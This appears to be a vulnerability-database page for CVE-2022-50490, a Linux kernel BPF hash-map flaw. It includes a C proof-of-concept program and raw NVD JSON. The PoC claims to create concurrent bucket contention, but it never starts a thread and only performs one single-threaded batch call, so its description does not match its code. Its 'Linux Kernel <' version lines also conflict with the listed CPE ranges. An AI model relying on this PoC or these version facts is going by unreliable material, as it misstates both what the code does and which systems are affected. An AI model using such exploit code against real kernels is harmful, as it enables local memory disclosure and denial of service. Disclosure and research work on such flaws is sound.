Security Vulnerability Report
CVE-2022-50490 CVSS 7.1 HIGH

CVE-2022-50490

Published: 2025-10-04 16:15:46
Last Modified: 2026-03-25 00:31:55
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

bpf: Propagate error from htab_lock_bucket() to userspace

In __htab_map_lookup_and_delete_batch(), if htab_lock_bucket() returns -EBUSY, it will go to the next bucket. Going to the next bucket may not only skip the elements in the current bucket silently, but also incur out-of-bound memory access or expose kernel memory to userspace if the current bucket_cnt is greater than bucket_size or zero.

Fix it by stopping the batch operation and returning -EBUSY when htab_lock_bucket() fails; the application can retry or skip the busy batch as needed.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (5.11 <= version < 5.15.75) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (5.16 <= version < 5.19.17) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (6.0 <= version < 6.0.3) - VULNERABLE
Linux Kernel < 5.15.80
Linux Kernel < 5.10.155
Linux Kernel < 5.4.225
Linux Kernel < 4.19.265

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2022-50490 PoC - Trigger EBUSY in htab_lock_bucket()
// This PoC demonstrates triggering the vulnerability by creating
// concurrent access to BPF hash map buckets
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

// Wrapper for the bpf(2) syscall (glibc provides no wrapper).
// BPF_MAP_TYPE_HASH, BPF_ANY and the BPF_MAP_* commands come from <linux/bpf.h>.
static int bpf(int cmd, union bpf_attr *attr, unsigned int size)
{
    return syscall(__NR_bpf, cmd, attr, size);
}

// Create a BPF hash map
static int create_hash_map(int map_type, int key_size, int value_size, int max_entries)
{
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;
    return bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

// Update a BPF map element
static int map_update_elem(int fd, const void *key, const void *value)
{
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = fd;
    attr.key = (__u64)(unsigned long)key;
    attr.value = (__u64)(unsigned long)value;
    attr.flags = BPF_ANY;
    return bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

// Lookup-and-delete batch operation - the code path changed by the fix.
// The batch parameters live in the "batch" struct member of union bpf_attr,
// not at the top level, so they are addressed as attr.batch.<field>.
static int map_lookup_and_delete_batch(int fd, void *in_batch, void *out_batch,
                                       void *keys, void *values, int *count)
{
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.batch.map_fd = fd;
    attr.batch.in_batch = (__u64)(unsigned long)in_batch;
    attr.batch.out_batch = (__u64)(unsigned long)out_batch;
    attr.batch.keys = (__u64)(unsigned long)keys;
    attr.batch.values = (__u64)(unsigned long)values;
    attr.batch.count = *count;
    int ret = bpf(BPF_MAP_LOOKUP_AND_DELETE_BATCH, &attr, sizeof(attr));
    *count = attr.batch.count; // kernel writes back the number of elements processed
    return ret;
}

int main(int argc, char **argv)
{
    int map_fd, ret;
    int batch_count = 4;
    __u32 keys[16];
    __u32 values[16];
    __u64 in_batch = 0;
    __u64 out_batch = 0;

    // Create a hash map with limited entries to trigger bucket contention
    map_fd = create_hash_map(BPF_MAP_TYPE_HASH, sizeof(__u32), sizeof(__u32), 4);
    if (map_fd < 0) {
        perror("Failed to create BPF map");
        return 1;
    }

    // Populate the map with a few elements; the PoC relies on bucket
    // contention to make htab_lock_bucket() return EBUSY
    for (int i = 0; i < 4; i++) {
        keys[i] = i;
        values[i] = i * 100;
        ret = map_update_elem(map_fd, &keys[i], &values[i]);
        if (ret < 0)
            perror("Failed to update map element");
    }

    // Perform batch lookup and delete - this may trigger the vulnerability
    // when htab_lock_bucket() returns EBUSY due to concurrent access
    ret = map_lookup_and_delete_batch(map_fd, &in_batch, &out_batch,
                                      keys, values, &batch_count);
    if (ret == -1)
        perror("Batch operation failed");
    else
        printf("Batch operation completed, count=%d\n", batch_count);

    close(map_fd);
    return 0;
}

References

https://git.kernel.org/stable/c/0e13425104903970a5ede853082d3bbb4edec6f3 (Patch)
https://git.kernel.org/stable/c/4f1f39a8f1ce1b24fee6852d7dcd704ce7c4334d (Patch)
https://git.kernel.org/stable/c/66a7a92e4d0d091e79148a4c6ec15d1da65f4280 (Patch)
https://git.kernel.org/stable/c/6bfee6eb3d6b96ae730a542909dd22b5f9f50d58 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50490", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.947", "lastModified": "2026-03-25T00:31:54.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Propagate error from htab_lock_bucket() to userspace\n\nIn __htab_map_lookup_and_delete_batch() if htab_lock_bucket() returns\n-EBUSY, it will go to next bucket. Going to next bucket may not only\nskip the elements in current bucket silently, but also incur\nout-of-bound memory access or expose kernel memory to userspace if\ncurrent bucket_cnt is greater than bucket_size or zero.\n\nFixing it by stopping batch operation and returning -EBUSY when\nhtab_lock_bucket() fails, and the application can retry or skip the busy\nbatch as needed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0e13425104903970a5ede853082d3bbb4edec6f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4f1f39a8f1ce1b24fee6852d7dcd704ce7c4334d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/66a7a92e4d0d091e79148a4c6ec15d1da65f4280", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6bfee6eb3d6b96ae730a542909dd22b5f9f50d58", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}